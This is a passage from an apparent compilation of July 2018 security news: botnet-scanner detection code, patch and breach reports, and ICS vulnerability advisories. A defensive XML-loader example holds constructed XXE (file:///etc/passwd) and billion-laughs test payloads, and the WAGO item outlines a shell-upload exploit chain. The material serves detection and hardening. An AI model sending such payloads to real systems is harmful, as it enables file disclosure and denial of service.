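2018-07-17T10:00:05 tcp 10.0.0.7:50000 -> 203.0.113.10:443
2018-07-17T10:00:06 tcp 10.0.0.7:50001 -> 203.0.113.10:443
2018-07-17T10:00:06 tcp 10.0.0.7:50002 -> 198.51.100.4:80
2018-07-17T10:00:07 udp 10.0.0.7:53001 -> 10.0.0.1:53
"""


def parse_line(line):
    """Return (proto, src, dst, dport) for a well-formed record, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return d["proto"], d["src"], d["dst"], int(d["dport"])


def find_scanners(log_text, min_tcp=MIN_TCP_TARGETS, min_udp=MIN_UDP_TARGETS):
    """Return {src: [reasons]} for sources matching either heuristic."""
    tcp_hits = defaultdict(set)  # src -> {(dst, dport)} on HNS ports only
    udp_dsts = defaultdict(set)  # src -> {dst} for any UDP packet
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines rather than abort the whole window
        proto, src, dst, dport = rec
        if proto == "tcp" and dport in HNS_SCAN_PORTS:
            tcp_hits[src].add((dst, dport))
        elif proto == "udp":
            udp_dsts[src].add(dst)

    findings = {}
    for src in sorted(set(tcp_hits) | set(udp_dsts)):
        reasons = []
        hits = tcp_hits.get(src, set())
        # Count distinct destinations, not packets: a scanner spreads out.
        if len({dst for dst, _ in hits}) >= min_tcp:
            ports = ",".join(str(p) for p in sorted({p for _, p in hits}))
            reasons.append("tcp-sweep:" + ports)
        if len(udp_dsts.get(src, ())) >= min_udp:
            reasons.append("udp-fanout")
        if reasons:
            findings[src] = reasons
    return findings


if __name__ == "__main__":
    for host, why in find_scanners(SAMPLE_LOG).items():
        print(host, why)
```

Running `find_scanners(SAMPLE_LOG)` reports only 10.0.0.5, with the ports it swept and the UDP fan-out flag; the ordinary client 10.0.0.7 is not reported. Ports 80 and 8080 alone are noisy on most networks, which is why the TCP rule keys on the number of distinct destinations rather than on any single port.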
Due to its peer-to-peer architecture, the botnet is rather difficult to shut down. Furthermore, the steady stream of updates seen over the past half-year suggests that Hide 'N Seek will continue to evolve, likely broadening its capabilities and target list.
Microsoft Patch Tuesday Updates Fix Over 50 Vulnerabilities
18.7.2018 securityweek Vulnerability
Microsoft’s Patch Tuesday updates for July 2018 address more than 50 vulnerabilities, but none of them appear to have been exploited for malicious purposes before the fixes were released.
The company has classified 18 of the flaws as critical and, similar to previous months, they mostly affect the Edge and Internet Explorer web browsers. Many of these security holes have been described as memory corruption bugs that allow remote code execution.
Three of the flaws patched this month were publicly disclosed before Microsoft released patches. The list includes CVE-2018-8278, a spoofing vulnerability affecting Edge; and CVE-2018-8314 and CVE-2018-8313, both of which are Windows privilege escalation vulnerabilities.
Trend Micro’s Zero Day Initiative (ZDI) has highlighted some of the more interesting flaws patched this month. One of them is a low severity Office tampering issue that can be exploited by getting the targeted user to open a specially crafted file.
“An attacker exploiting this vulnerability could embed untrusted TrueType fonts into an email. Bugs in fonts have been popular since 2013 and have been used in malware attacks in the past. This bug could allow them to spread and possibly even bypass traditional filters. That’s likely the reason Microsoft chose to go ahead and release a patch for this Low-rated vulnerability,” ZDI explained in a blog post.
Another interesting vulnerability that is not very serious affects the Microsoft Wireless Display Adapter (MWDA). The flaw allows an authenticated attacker to execute arbitrary commands, but what makes the issue interesting is the fact that a firmware update is required to address it.
“To get the new firmware, it has to be downloaded from the Wireless Display Adapter App available in the Microsoft App Store. That doesn’t sound like something easily automated. From a sysadmin’s perspective, this patch will be very labor intensive to roll out,” ZDI said.
Microsoft also made some updates to advisories describing the Spectre and Meltdown vulnerabilities, including to inform users of a new Spectre variant.
Adobe’s Patch Tuesday updates resolve more than 100 vulnerabilities in Acrobat and Reader, including dozens of critical memory corruption bugs that can allow remote code execution. The company has also released security updates for Flash Player, Experience Manager, and Connect.
Departing Apple Engineer Stole Autonomous Car Tech: FBI
18.7.2018 securityweek BigBrothers
An ex-Apple engineer on Monday was charged with stealing secrets from a hush-hush self-driving car technology project days before he quit to go to a Chinese startup.
Xiaolang Zhang was in custody for stealing trade secrets from the Apple project, according to a copy of the criminal complaint posted online.
The charge is punishable by 10 years in prison and a $250,000 fine.
"Apple takes confidentiality and the protection of our intellectual property very seriously," the California-based internet titan said in response to an AFP query.
"We're working with authorities on this matter and will do everything possible to make sure this individual and any other individuals involved are held accountable for their actions."
Zhang was hired by Apple in December of 2015 to be part of a team developing hardware and software for self-driving vehicles, a project that was a "closely-guarded secret," according to the complaint filed by the FBI.
Zhang took paternity leave in the month of April, going with his family to China.
Upon his return to Apple at the end of April, he told a supervisor he was quitting to return to China to be near his ailing mother.
Zhang mentioned he planned to go work for a Chinese self-driving vehicle startup called Xiaopeng Motors, or XMotors, in Guangzhou, according to the complaint.
The supervisor thought Zhang "evasive" and brought in an Apple product security team, which had Zhang turn in all company devices and walked him off campus, according to the filing.
Apple security found that Zhang's activity on the company network surged "exponentially" in the days before he returned from paternity leave.
Zhang did searches of confidential databases, and downloaded technical files, the criminal complaint said.
Documents downloaded by Zhang included some on topics such as "prototypes," according to the case against him.
Apple also had closed-circuit camera recording of Zhang going into autonomous driving tech team labs late on a Saturday night while he was on paternity leave, according to the filing.
Zhang later admitted to taking circuit boards and a Linux server from the hardware lab, and to transferring some Apple files to his wife's computer, the FBI said in the complaint.
Zhang was "voluntarily terminated" from Apple in early March, and FBI agents searched his home in June as part of their investigation.
Zhang told the FBI at that time he was working at XMotors offices in Silicon Valley, according to the complaint.
Zhang was heading to China with a "last-minute round-trip ticket" when FBI agents arrested him at an airport in the Silicon Valley city of San Jose, the filing said.
Intel Pays $100,000 Bounty for New Spectre Variants
18.7.2018 securityweek Security
Researchers have discovered new variations of the Spectre attack and they received $100,000 from Intel through the company’s bug bounty program.
The new flaws are variations of Spectre Variant 1 (CVE-2017-5753) and they are tracked as Spectre 1.1 (CVE-2018-3693) and Spectre 1.2.
The more serious of these issues is Spectre 1.1, which has been described as a bounds check bypass store (BCBS) issue.
“[Spectre1.1 is] a new Spectre-v1 variant that leverages speculative stores to create speculative buffer overflows,” researchers Vladimir Kiriansky of MIT and Carl Waldspurger of Carl Waldspurger Consulting explained in a paper.
“Much like classic buffer overflows, speculative out-of-bounds stores can modify data and code pointers. Data-value attacks can bypass some Spectre-v1 mitigations, either directly or by redirecting control flow. Control-flow attacks enable arbitrary speculative code execution, which can bypass fence instructions and all other software mitigations for previous speculative-execution attacks. It is easy to construct return-oriented-programming (ROP) gadgets that can be used to build alternative attack payloads,” they added.
Spectre 1.2 affects CPUs that do not enforce read/write protections during speculative execution: a speculative store can overwrite read-only data and code pointers, which the researchers say could be used to break out of sandboxes.
Both Intel and ARM have published whitepapers describing the new vulnerabilities. AMD has yet to make any comments regarding Spectre 1.1 and Spectre 1.2.
Microsoft also updated its Spectre/Meltdown advisories on Tuesday to include information on CVE-2018-3693.
“We are not currently aware of any instances of BCBS in our software, but we are continuing to research this vulnerability class and will work with industry partners to release mitigations as required,” the company said.
Oracle is also assessing the impact of these vulnerabilities on its products and has promised to provide technical mitigations.
“Note that many industry experts anticipate that a number of new variants of exploits leveraging these known flaws in modern processor designs will continue to be disclosed for the foreseeable future,” noted Eric Maurice, Director of Security Assurance at Oracle. “These issues are likely to primarily impact operating systems and virtualization platforms, and may require software update, microcode update, or both. Fortunately, the conditions of exploitation for these issues remain similar: malicious exploitation requires the attackers to first obtain the privileges required to install and execute malicious code against the targeted systems.”
Just as the researchers published their paper, Intel made a $100,000 payment to Kiriansky via the company’s HackerOne bug bounty program. The experts did reveal in their paper that the research was partially sponsored by Intel.
Following the disclosure of the Spectre and Meltdown vulnerabilities in January, Intel announced a bug bounty program for side-channel exploits with rewards of up to $250,000 for issues similar to Meltdown and Spectre. The reward for flaws classified “high severity” can be as high as $100,000.
Facebook Faces Australia Data Breach Compensation Claim
18.7.2018 securityweek Social
Facebook could face a hefty compensation bill in Australia after a leading litigation funder lodged a complaint with the country's privacy regulator over users' personal data shared with a British political consultancy.
The social networking giant admitted in April the data of up to 87 million people worldwide -- including more than 300,000 in Australia -- was harvested by Cambridge Analytica.
Under Australian law, all organisations must take "reasonable steps" to ensure personal information is held securely, and IMF Bentham has teamed up with a major law firm to lodge a complaint with the Office of the Australian Information Commissioner (OAIC).
The OAIC launched an investigation into the alleged breaches in April and, depending on its outcome, a class action could follow.
IMF said in a statement late Tuesday it was seeking "compensation for Facebook users arising from Facebook's alleged breaches of the Australian Privacy Principles contained in the Privacy Act 1988".
"The alleged breaches surround the circumstances in which a third party, Cambridge Analytica, gained unauthorised access to users' profiles and information.
"The complaint seeks financial recompense for the unauthorised access to, and use of, their personal data."
In its statement, IMF Bentham said it appeared Facebook learned of the breach in late 2015, but failed to tell users about it until this year.
IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-US$7,500).
This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.
Facebook did not directly comment on the IMF Bentham action but a spokesperson told AFP Wednesday: "We are fully cooperating with the investigation currently underway by the Australian Privacy Commissioner.
"We will review any additional evidence that is made available when the UK Office of the Information Commissioner releases their report."
CredSSP Flaw Exposes Pepperl+Fuchs HMI Devices to Attacks
18.7.2018 securityweek Attack Vulnerability
A vulnerability in the Credential Security Support Provider (CredSSP) authentication protocol has been found to impact several human-machine interface (HMI) products from Germany-based industrial automation firm Pepperl+Fuchs.
The flaw, tracked as CVE-2018-0886, affects all supported versions of Windows and it was fixed by Microsoft with its March 2018 Patch Tuesday updates.
The vulnerability was discovered by security firm Preempt, which has classified it as critical, but Microsoft, which believes exploitation is “less likely,” has assigned it only an “important” severity rating.
CredSSP processes authentication requests for applications such as the Remote Desktop Protocol (RDP) and Windows Remote Management (WinRM). A man-in-the-middle (MitM) attacker can exploit this vulnerability to remotely execute arbitrary code and move laterally within the targeted organization’s network.
Microsoft says any application using CredSSP for authentication could be vulnerable to this type of attack.
According to an advisory published by Germany’s CERT@VDE, an organization that focuses on industrial cybersecurity, CVE-2018-0886 affects Pepperl+Fuchs’ VisuNet RM, VisuNet PC, and Box Thin Client BTC human-machine interface products.
“A successful vulnerability exploitation enables an attacker to execute arbitrary code and get access to sensitive data, e.g. passwords of the compromised system. The vulnerability allows the attacker to intercept the initial RDP connection between a client and a remote-server. Then an attacker can relay user credentials to a target system and thus get complete Man in the Middle control over a session. A stolen session can be abused to run arbitrary code or commands on the target server on behalf of the user,” CERT@VDE said in its advisory.
Pepperl+Fuchs has advised owners of devices running its RM Shell 4 and RM Shell 5 HMI software to install the security patches provided by the company. Users of devices running Windows 7 or Windows 10 can patch the vulnerability by updating Windows. Since the fix is enforced on both ends of a CredSSP exchange, and Microsoft's May 2018 updates moved the default CredSSP policy to "Mitigated", an updated client refuses to authenticate to an RDP or WinRM server that still lacks the fix, so HMI thin clients and the servers they connect to need to be updated together.
The advisory from CERT@VDE says Preempt reported the vulnerabilities to Pepperl+Fuchs, but the security firm told SecurityWeek that it did not explicitly reach out to any ICS vendor.
“CredSSP is a broadly used protocol and we worked with Microsoft, since it was in their software that we found these vulnerabilities,” said Ajit Sancheti, co-founder and CEO at Preempt. “It is quite likely that Pepperl+Fuchs uses the MSFT version and hence may have been informed by them.”
Products from other ICS vendors are likely also affected by the CredSSP vulnerability, but to date no other company has published security advisories.
Britain to Fine Facebook Over Data Breach
18.7.2018 securityweek Incident Social
Britain's data regulator said Wednesday it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.
The Information Commissioner's Office (ICO) began investigating the social media giant earlier this year, when evidence emerged that an app had been used to harvest the data of tens of millions of Facebook users worldwide.
In the worst ever public relations disaster for the social media giant, Facebook admitted that up to 87 million users may have had their data hijacked by British consultancy firm Cambridge Analytica, which was working for US President Donald Trump's 2016 campaign.
Cambridge Analytica, which also had meetings with the Leave.EU campaign ahead of Britain's EU referendum in 2016, denies the accusations and has filed for bankruptcy in the United States and Britain.
"In 2014 and 2015, the Facebook platform allowed an app... that ended up harvesting 87 million profiles of users around the world that was then used by Cambridge Analytica in the 2016 presidential campaign and in the referendum," Elizabeth Denham, the information commissioner, told BBC radio.
Wednesday's ICO report said: "The ICO's investigation concluded that Facebook contravened the law by failing to safeguard people's information."
Without detailing how the information may have been used, it said the company had "failed to be transparent about how people's data was harvested by others".
The ICO added that it plans to issue Facebook with the maximum available fine for breaches of the Data Protection Act -- an equivalent of $660,000 or 566,000 euros.
Because of the timing of the breaches, the ICO said it was unable to impose the higher penalties introduced since by the EU's General Data Protection Regulation (GDPR), under which fines can reach 4 percent of Facebook's global annual turnover.
In Facebook's case this would amount to around $1.6 billion (1.4 billion euros).
"In the new regime, they would face a much higher fine," Denham said.
- 'Doing the right thing' -
"We are at a crossroads. Trust and confidence in the integrity of our democratic processes risk being disrupted because the average voter has little idea of what is going on behind the scenes," Denham said.
"New technologies that use data analytics to micro-target people give campaign groups the ability to connect with individual voters. But this cannot be at the expense of transparency, fairness and compliance with the law."
In May, Facebook chief Mark Zuckerberg apologised to the European Parliament for the "harm" caused.
EU Justice Commissioner Vera Jourova welcomed the ICO report.
"It shows the scale of the problem and that we are doing the right thing with our new data protection rules," she said.
"Everyone from social media firms, political parties and data brokers seem to be taking advantage of new technologies and micro-targeting techniques with very limited transparency and responsibility towards voters," she said.
"We must change this fast as no-one should win elections using illegally obtained data," she said, adding: "We will now assess what can we do at the EU level to make political advertising more transparent and our elections more secure."
- Hefty compensation bill -
The EU in May launched strict new data-protection laws allowing regulators to fine companies up to 20 million euros ($24 million) or four percent of annual global turnover.
But the ICO said because of the timing of the incidents involved in its inquiry, the penalties were limited to those available under previous legislation.
The next phase of the ICO's work is expected to be concluded by the end of October.
Erin Egan, chief privacy officer at Facebook, said: "We have been working closely with the ICO in their investigation of Cambridge Analytica, just as we have with authorities in the US and other countries. We're reviewing the report and will respond to the ICO soon."
The British fine comes as Facebook faces a potentially hefty compensation bill in Australia, where litigation funder IMF Bentham said it had lodged a complaint with regulators over the Cambridge Analytica breach, which is thought to affect some 300,000 users in Australia.
IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-$7,500).
This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.
Israeli Firm Radiflow Raises $18 Million to Grow Industrial Cybersecurity Business
18.7.2018 securityweek IT ICS
Israeli cybersecurity firm Radiflow, which provides security solutions for industrial control systems (ICS) and supervisory control and data acquisition (SCADA) networks, announced on Wednesday that it has raised $18 million in venture funding in an investment round led by Singapore-based engineering company ST Engineering.
Radiflow’s product offerings include risk assessment, threat detection and secure remote access tools with industrial asset visibility and anomaly detection.
Under a strategic partnership, ST Engineering has integrated Radiflow’s detection and prevention tools with its SCADA system.
More specifically, Radiflow said that its tools would be integrated with ST Engineering’s Rail Command, Control and Communications (C3) Systems (SCADA) to offer an end-to-end cybersecurity solution for the rail transport industry.
Radiflow says the investment will be used to expand its sales team to support growing market demand, strengthen its brand globally and support product development.
Radiflow also recently announced partnerships with Palo Alto Networks and RSA, to make field deployments easier and help ensure compliance with new regulations, including NERC CIP and the EU NIS Directive.
Radiflow will demonstrate its technology at SecurityWeek’s 2018 ICS Cyber Security Conference, taking place October 22-25, 2018 in Atlanta.
Radiflow is one of several cybersecurity startups targeting the industrial space that have raised funding. Some others include Dragos, Indegy, Bayshore Networks, CyberX, SCADAfence and Nozomi Networks. Veteran industrial software firm PAS raised $40 million in April 2017. Darktrace, which has an offering targeted to the industrial sector, raised $75 million at a valuation of $825 million in July 2017. Just last month, New York-based Claroty announced that it had raised $60 million in a Series B funding round, bringing the total amount raised by the company to date to $93 million.
Power Grid Protection Firm SEL Patches Severe Software Flaws
18.7.2018 securityweek ICS
Several vulnerabilities, including ones rated high severity, have been discovered in management and configuration tools from power grid protection company Schweitzer Engineering Laboratories (SEL). The vendor has released software updates to address the flaws.
The security holes were discovered by Gjoko Krstic, a researcher with industrial cybersecurity firm Applied Risk. The flaws affect SEL Compass, a tool designed for managing SEL products, and AcSELerator Architect, an app that streamlines the configuration and documentation of IEC 61850 control and SCADA communications.
According to advisories published by Applied Risk and ICS-CERT, AcSELerator Architect versions prior to the patched release are affected by two vulnerabilities. One of them, a high severity XML External Entity (XXE) vulnerability, can lead to information disclosure and in some cases to arbitrary code execution or a denial-of-service (DoS) condition. The flaw, tracked as CVE-2018-10600, can be exploited by getting the targeted user to open a specially crafted template or project file.
“The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project and/or template file (.selaprj). This attack can also be used to execute arbitrary code (in certain circumstances, depending on the platform) or cause a denial of service (DoS) condition (billion laughs) via a specially crafted XML file including multiple external entity references,” Applied Risk wrote in its advisory.
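The two failure modes Applied Risk describes for the XXE bug, external entity resolution and entity-expansion DoS, share one root cause: the project-file parser accepts a DTD. The loader below is an added example, not SEL’s code and not based on AcSELerator’s actual file format; it uses Python’s expat bindings to refuse a DOCTYPE, an entity declaration or an external entity reference before anything is expanded. The three sample documents are constructed for the example and stand in for .selaprj files.

```python
"""Hardened loader for XML-based project/template files.

Added example, not SEL's or Applied Risk's code.  It refuses any DTD, entity
declaration or external entity reference before expat can act on it, which
closes both the XXE information-disclosure path and the "billion laughs"
expansion DoS described in the advisory.  The sample documents below are
constructed for this example and are not real .selaprj files.
"""
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """Raised when a project file carries DTD/entity constructs or is malformed."""


def load_project(xml_bytes):
    """Parse xml_bytes and return [(tag, attrs), ...] for every element.

    Raises UnsafeXmlError on any DOCTYPE, entity declaration or external
    entity reference, and on malformed XML.
    """
    elements = []
    parser = expat.ParserCreate()
    # Never fetch or parse parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject(*_args):
        # Raising inside an expat handler stops the parse and propagates.
        raise UnsafeXmlError("DTD and entity declarations are not permitted")

    # Fires on '<!DOCTYPE ...>' before any entity inside it is processed.
    parser.StartDoctypeDeclHandler = reject
    # Fires on every '<!ENTITY ...>' (internal, SYSTEM or PUBLIC).
    parser.EntityDeclHandler = reject
    # Fires when an external entity is referenced from content.
    parser.ExternalEntityRefHandler = reject
    parser.StartElementHandler = lambda name, attrs: elements.append((name, dict(attrs)))

    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        raise UnsafeXmlError(f"malformed XML: {exc}") from None
    return elements


def is_accepted(xml_bytes):
    """True if load_project() accepts the document, False if it rejects it."""
    try:
        load_project(xml_bytes)
    except UnsafeXmlError:
        return False
    return True


# Constructed benign project file.
BENIGN_PROJECT = b"""<?xml version="1.0"?>
<Project name="Substation-A">
  <Device ied="SEL-451" ip="192.0.2.10"/>
</Project>
"""

# Constructed XXE payload: an external entity pointing at a local file.
XXE_PROJECT = b"""<?xml version="1.0"?>
<!DOCTYPE Project [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<Project name="&xxe;"/>
"""

# Constructed "billion laughs": nested internal entities that expand exponentially.
BILLION_LAUGHS_PROJECT = b"""<?xml version="1.0"?>
<!DOCTYPE Project [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<Project name="&lol2;"/>
"""


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_PROJECT), ("xxe", XXE_PROJECT),
                       ("billion-laughs", BILLION_LAUGHS_PROJECT)]:
        print(label, "accepted" if is_accepted(doc) else "rejected")
```

Rejecting at the DOCTYPE is the right place to fail: both the XXE payload and the billion-laughs payload are stopped before the parser has done any expansion work, and `SetParamEntityParsing(..., NEVER)` guards against an external DTD subset being fetched even if the DOCTYPE handler were absent. A project-file format that genuinely needs a DTD should instead ship a fixed, embedded schema and validate against that after parsing with entities disabled.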
The second flaw affecting AcSELerator Architect, identified as CVE-2018-10608, is a medium severity DoS issue that can be triggered using a malicious FTP server.
“The vulnerability can be triggered when an attacker provides the victim with a rogue malicious FTP server and listens for connections from the AcSELerator Architect FTP client feature. Once the victim gets connected to the evil FTP via the TCP protocol, a 100% CPU exhaustion occurs rendering the software to hang (not responding), denying legitimate workflow to the victim until the application is forcibly restarted,” Applied Risk explained.
As for SEL Compass, the application is affected by a high severity insecure file permissions issue that can be exploited for privilege escalation. This bug is tracked as CVE-2018-10604.
“The vulnerability exists due to the improper permissions on the SEL Compass directory, with the 'F' flag (Full) for 'Everyone' group. This gives an authenticated attacker the ability to modify or overwrite any file in the Compass directory with malicious code (trojan or a rootkit). This could result in escalation of privileges or malicious effects on the system the next time that a privileged user runs Compass,” Applied Risk said in a different advisory.
SEL patched the vulnerabilities in new releases of SEL Compass and AcSELerator Architect. Applied Risk told SecurityWeek that it took the vendor more than three months to release the updates.
SEL recently teamed up with industrial cybersecurity firm Dragos to “arm the electric power community with the tools to better detect and respond to threats within their industrial control system (ICS) networks.”
Outdated DoD IT Jeopardizes National Security: Report
18.7.2018 securityweek BigBrothers
Failure to Modernize Legacy DoD Systems is Putting U.S. National Security in Jeopardy, Report Claims
In a new study titled 'Innovation Imperative: The Drive to Modernize DoD', Meritalk queried 150 federal IT managers working in Department of Defense (DoD) organizations. The stated objective was "to understand the state of their IT infrastructure and applications." This was to include levels of satisfaction, an indication of where missions are being met or missed, and what should be done next.
In fact, this report is solely about DoD IT managers' attitude towards cloud migration -- which is perhaps unsurprising since the survey was underwritten by AWS and Red Hat.
The results confirm a strong belief that cloud is the way forward -- and perhaps the only way for the U.S. military to maintain an advantage over the world's other superpowers: China and increasingly Russia. For example, 80% of the respondents say the DoD needs to improve the use of cloud to maintain the military’s technical advantage and support mission success; and 81% say accelerating DoD’s adoption of cloud is critical.
86% of respondents said that failing to modernize legacy DoD systems is putting U.S. national security in jeopardy.
The increasing use of artificial intelligence and big data analytics by the military, the need for more efficient data sharing between agencies, and the power to transcribe and translate massive amounts of recorded voice in almost real time can only be served by the power and flexibility of the cloud.
Respondents to the survey see DoD cloud adoption as important for big data analytics (85%), electronic warfare (83%), shared services (82%), DevOps (81%), AI (77%), IoT (73%), machine learning (72%) and blockchain (61%). But this understanding is not new to the DoD.
The Joint Enterprise Defense Infrastructure (JEDI) initiative is a plan for the DoD to acquire its own commercial cloud infrastructure suitable to hold DoD data at all classification levels, and available to any organization in DoD. It is a massive project spread over a ten-year ordering period, and thought to have a budget of around $10 billion over that timeframe.
It is believed that the DoD's preference is to award the project to a single provider; and it is equally believed that AWS is the frontrunner. Smaller existing cloud providers would lose out, and have been lobbying for a multi-provider approach. Microsoft, Google and IBM are also rumored to be interested in bidding for the project.
There is little mention of JEDI within the Meritalk survey. However, 51% of the respondents said they believe that a single-vendor cloud solution has more pros than cons. Sixty-three percent said that talk about JEDI has had "a positive impact on the pace of their organization’s IT modernization efforts"; and "72% feel utilizing multiple cloud vendors would increase the complexity of their organization’s system integrations."
The Meritalk survey, underwritten by AWS and Red Hat, offers strong support for the DoD's single supplier JEDI preference, where AWS (most probably backed by Red Hat software) is the frontrunner.
But regardless of who wins the JEDI provider contract, the survey also demonstrates that DoD IT managers are ready to increase their migration to the cloud. More than 50% of the respondents would recommend moving 50% of their current data to the cloud (13% would move 'the vast majority' of their data). They are unlikely -- and in some cases for reasons of national security unable -- to adopt a cloud-only strategy.
This will set the DoD on a path directly parallel to that faced by commercial enterprises today -- to what extent should existing infrastructures and data be migrated to the cloud, how can it be achieved, and how do you secure it? The one major difference is that the DoD already knows which cloud; that is, the JEDI cloud.
"The survey shows that the interest and promise of the cloud is well recognized, but the DoD would benefit from the lessons being learned right now by large private enterprises going through the same processes," Ken Spinner, VP of field engineering at Varonis told SecurityWeek. "Private industry, which is often recognized for its agility and embrace of new technologies, still largely works with a hybrid mix of cloud and on-premises systems and storage."
"One thing is certain," agrees Rick Moy, head of marketing at Acalvio: "hybrid networks, or cloud and on-premises." Both agree that adoption of JEDI -- or any other cloud solution -- will present the DoD organizations with both challenges and opportunities.
"There’s no easy button and the cloud is not without risks," says Spinner. "Another concern, and perhaps the weakest link, are the defense contractors that access confidential intelligence as part of their daily workload. It’s far too tempting for a few bad actors to breach a system and attempt to steal data -- the cloud needs to be protected just like on-premises systems and data. Another challenge will be to ensure that the security capabilities people currently have with on-prem solutions are available and tested with both pure cloud solutions and hybrid solutions."
But Moy adds the possibility of 'starting over'. "I would argue that a move to cloud represents a fresh opportunity to build in better security and advanced monitoring capabilities," he told SecurityWeek: "ones that we may have overlooked in on-premises deployments. For instance, unified policy, access controls, deception, logging and monitoring, and so on."
The JEDI project shows that the DoD hierarchy is already set on a cloud future; and the Meritalk survey shows that individual DoD IT managers are ready for the challenge. "As DoD knows," concludes the Meritalk report, "cloud isn’t the final destination -- but it sets the foundation for necessary innovation, collaboration, and next-generation technologies like big data analytics, shared services, AI, and electronic warfare. Agencies must keep their eyes on the future and consider cloud in terms of broader IT modernization efforts government-wide."
AT&T to Acquire Threat Management Firm AlienVault
18.7.2018 securityweek IT
AT&T on Tuesday said it would acquire San Mateo, Calif.-based threat management and intelligence firm AlienVault for an undisclosed sum.
AlienVault offers its Unified Security Management platform and Open Threat Exchange intelligence community, which will be integrated into AT&T’s cybersecurity suite of services.
Both companies have approved the agreement but the terms of the deal haven’t been disclosed. The acquisition, which is subject to customary closing conditions, is expected to complete in the third quarter of 2018.
AlienVault had raised more than $118 million in funding prior to agreeing to be acquired by the telecom giant.
With the acquisition of AlienVault, AT&T aims at expanding its portfolio of enterprise-focused security solutions to target small and medium-sized businesses.
“Regardless of size or industry, businesses today need cyber threat detection and response technologies and services. The current threat landscape has shifted this from a luxury for some, to a requirement for all,” Thaddeus Arroyo, CEO, AT&T Business, commented.
After the transaction is completed, AT&T will provide business customers with a unified security management platform that aims at helping organizations detect and respond to threats more effectively. According to AT&T, AlienVault will become a key part of its Edge-to-Edge Intelligence capabilities.
Although the two companies did not provide details on the transaction, AT&T did say the deal is not “expected to have a material effect on AT&T’s results.”
Hacker Offers Access to Machine at International Airport for $10
18.7.2018 securityweek Hacking
The cost of RDP (Remote Desktop Protocol) access to a system located at a major international airport is only $10 on the Dark Web, McAfee has discovered.
RDP, a proprietary Microsoft protocol that provides access to remote machines through a graphical interface, was designed for administration purposes, but cybercriminals are increasingly using it as part of their arsenal of attack tools.
In fact, numerous malware families have adopted RDP over the past several years, which resulted in the technique becoming more popular than email for ransomware distribution.
SamSam, the ransomware behind multiple attacks against healthcare organizations, has adopted the technique as well. SamSam was the malware used to infect customer-facing applications and some internal services at the City of Atlanta (recovery would cost the city over $10 million).
As McAfee has discovered, it’s actually incredibly easy for cybercriminals to gain RDP access to high-value networks: they only need to access an underground market and spend an initial $10 or less, or conduct their own scans for accessible systems.
The researchers looked into several RDP shops, offering between 15 and more than 40,000 RDP connections for sale. The largest of these shops is the Ultimate Anonymity Service (UAS), a Russian business, followed by Blackpass, Flyded, and xDedic (which was first analyzed in June 2016).
On these marketplaces, cybercriminals sell RDP access to a broad range of systems, ranging from Windows XP to Windows 10, with Windows 2008 and 2012 Server being the most popular (at around 11,000 and 6,500, respectively). Prices range from $3 (for a simple configuration) to $19 (for a high-bandwidth system with admin rights).
Access to systems running Windows Embedded Standard (or Windows IOT) is also available, including hundreds of similar configurations associated with municipalities, housing associations, and healthcare institutions in the Netherlands. Multiple government systems worldwide were also being sold.
On the UAS Shop, the researchers also found a newly added Windows Server 2008 R2 Standard machine available for only $10, and they eventually discovered it was located at a major international airport in the United States.
The investigation also revealed that the system had three user accounts available, one being an administrator account, while the other two were associated with a company specializing in airport security and building automation and with another specializing in camera surveillance and video analytics for airports.
“We did not explore the full level of access of these accounts, but a compromise could offer a great foothold and lateral movement through the network using tools such as Mimikatz,” McAfee points out.
An account found on another system led the researchers to a domain that appears to be related to “the airport’s automated transit system, the passenger transport system that connects terminals.” This system too was accessible from the Internet.
“Now we know that attackers, like the SamSam group, can indeed use an RDP shop to gain access to a potential high-value ransomware victim. We found that access to a system associated with a major international airport can be bought for only $10—with no zero-day exploit, elaborate phishing campaign, or watering hole attack,” the researchers underline.
While remote access to systems might be essential for administrators, it can also become a liability if not properly secured. Furthermore, with RDP shops stockpiling addresses of vulnerable machines, cybercriminals do not need to put much effort into selecting victims: they only need to make a simple online purchase.
“In addition to selling RDP, some of these shops offer a lively trade in social security numbers, credit card data, and logins to online shops. […] BlackPass offered the widest variety of products. The most prolific of these brokers provide one-stop access to all the tools used to commit fraud: RDP access into computers, social security numbers and other integral data to set up loans or open bank accounts,” McAfee said.
Hackers Can Chain Multiple Flaws to Attack WAGO HMI Devices
18.7.2018 securityweek Vulnerability
Germany-based industrial automation company WAGO has patched several vulnerabilities in its e!DISPLAY 7300T Web Panel human-machine interface (HMI) products that can be chained to take control of affected devices.
The security holes, discovered by researchers at security consultancy SEC Consult and rated “high severity,” include multiple reflected and one stored cross-site scripting (XSS) vulnerabilities (CVE-2018-12981), unrestricted file upload and file path manipulation issues (CVE-2018-12980), and an incorrect default permissions flaw (CVE-2018-12979).
The reflected XSS flaws allow an unauthenticated attacker to execute arbitrary scripts in the context of the victim and hijack their session by getting them to click on a specially crafted link. The stored XSS can only be exploited by an authenticated attacker, but it does not require the targeted user to click on a link. Instead, the malicious code is triggered when the victim visits the “PLC List” page in the web interface.
The unrestricted file upload vulnerability allows an attacker to upload arbitrary files, but not directly to the web root, as the web service does not run as a privileged user. On the other hand, the incorrect default permissions weakness does allow a file in the web root, specifically index.html, to be overwritten by the unprivileged “www” user.
Combining these flaws allows an attacker to upload a shell by overwriting index.html and execute arbitrary commands with the privileges of the “www” user.
